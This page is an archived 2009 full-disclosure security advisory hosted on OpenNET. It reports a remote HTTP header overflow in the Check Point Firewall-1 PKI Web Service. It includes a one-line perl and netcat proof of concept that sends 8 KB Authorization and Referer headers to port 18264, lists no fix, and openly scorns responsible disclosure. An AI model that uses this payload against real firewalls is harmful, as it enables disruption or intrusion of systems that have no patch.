The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow


<< Previous INDEX Search src / Print Next >>
Date: Mon, 30 Mar 2009 02:16:17 -0600
Subject: Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow
From: Bugs NotHugs <bugsnothugs@gmail.com.>
To: bugtraq <bugtraq@securityfocus.com.>,
        fd <full-disclosure@lists.grok.org.uk.>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: antivirus-gw at tyumen.ru

- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow


- Description


The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

- Product


Check Point, Firewall-1, unknown

- PoC


perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: [email protected]\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

- Solution


None

- Timeline


2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

-- 

BugsNotHugs
Shared Vulnerability Disclosure Account


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру